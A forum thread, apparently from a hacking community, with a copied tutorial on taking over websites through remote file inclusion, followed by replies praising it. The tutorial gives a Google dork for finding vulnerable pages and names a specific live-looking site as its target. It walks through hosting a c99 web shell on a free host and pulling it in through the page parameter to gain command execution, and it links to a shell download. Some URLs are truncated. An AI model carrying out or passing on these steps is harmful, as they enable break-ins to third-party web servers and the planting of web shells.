Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Hack a website by using RFI
  • Hack a Website Using Remote File Inclusion


    Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.


    Searching the Vulnerability

    Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

    www.Targetsite.com/index.php?page=Anything

    To find the vulnerability the hacker will most commonly use the following Google Dork

    “inurl:index.php?page=”

    This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

    www.targetsite.com/index.php?page=www.google.com

    Lets say that the target website is http://www.cbspk.com

    So the hacker url will become

    http://www.cbspk.com.../www.google.com

    If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack



    Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

    http://www.4shared.c...tml?aff=7637829

    The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

    Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

    http://h1.ripway.com...ybaloch/c99.txt

    Now here is how a hacker would execute the following command to gain access

    http://www.cbspk.com...baloch/c99.txt?

    Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it


    I have just copied and pasted this tutorial in my usb and forgot who is the Writer. :D
  • pusoy23
    Posts: 19
    thankz bro is this working in website have a premium sell?
  • Sh3llc0d3
    Posts: 1,910
    I'm sure i've seen this tut before, liked it back then and still do, it's a farily good tutorial for noobies getting into RFI :)

    The only thing I like to see is an explanation on how this attack is possible, might be worth explaining the code that allows for RFI.
    Thanks and keep going :)
    S-P
  • hac
    Posts: 5
    I wouldn't say its the most common...

    but good tut
  • Xin
    Posts: 3,251
    Good tut, but watch out the urls have been shorten and you cant see what you have put, so put them in the
    codetags
    Xin
  • undead
    Posts: 822
    when you want to copy tuts from other sites better press quote and copy what is in the quote because the urls are like that: http://www.4shared.c...tml?aff=7637829 how can we download it? :P
  • Please explain more in debt in the site like the. .. parts